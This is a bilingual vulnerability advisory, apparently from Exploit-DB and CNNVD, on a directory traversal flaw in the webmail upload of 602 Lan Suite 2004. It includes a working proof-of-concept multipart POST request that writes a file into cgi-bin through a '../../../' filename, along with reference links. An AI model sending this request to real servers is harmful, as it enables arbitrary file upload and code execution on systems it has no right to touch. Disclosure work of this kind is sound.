https://www.exploit-db.com/exploits/25092
https://www.securityfocus.com/bid/90294
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-457

602LANSUITE2004.0.04.1221中存在目录遍历漏洞，允许远程验证用户通过filename参数中的..(参数中包含’..’)来上传和执行任意文件。

source: http://www.securityfocus.com/bid/12495/info

602 Lan Suite 2004 is reportedly affected by a vulnerability regarding the uploading of file attachments. This issue is due to the application failing to properly sanitize the names of file attachments before upload. A malicious user could exploit this vulnerability using directory traversal attacks to upload a file to an arbitrary location accessible by the affected server.

This vulnerability could lead to the execution of a malicious file on the server hosting the application.

602 Lan Suite 2004 version 2004.0.04.1221 is reportedly vulnerable; other versions may also be affected. 

POST /mail HTTP/1.0
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------287661860715985
Content-length: 540

-----------------------------287661860715985
Content-Disposition: form-data; name="U"

6E13745843714258F86310B04D7
-----------------------------287661860715985
Content-Disposition: form-data; name="A"

ATTACHMENTS
-----------------------------287661860715985
Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt"
Content-Type: text/plain

Test File
-----------------------------287661860715985
Content-Disposition: form-data; name="ATTACH"

Attach
-----------------------------287661860715985--

Software602 602Lan Suite 2004.0.04.1221

来源:MISC
链接:http://www.security.org.sg/vuln/602lansuite1221.html
来源:SECUNIA
名称:14169
链接:http://secunia.com/advisories/14169/
来源:BUGTRAQ
名称:20050208[SIG^2G-TEC]602LANSUITEWebMailVulnerabilityAllowsFileUploadtoArbitraryDirectories
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110793103506620&w;=2
来源:XF
名称:602lansuite-webmail-directory-traversal(19258)
链接:http://xforce.iss.net/xforce/xfdb/19258
来源:SECTRACK
名称:1013106
链接:http://securitytracker.com/id?1013106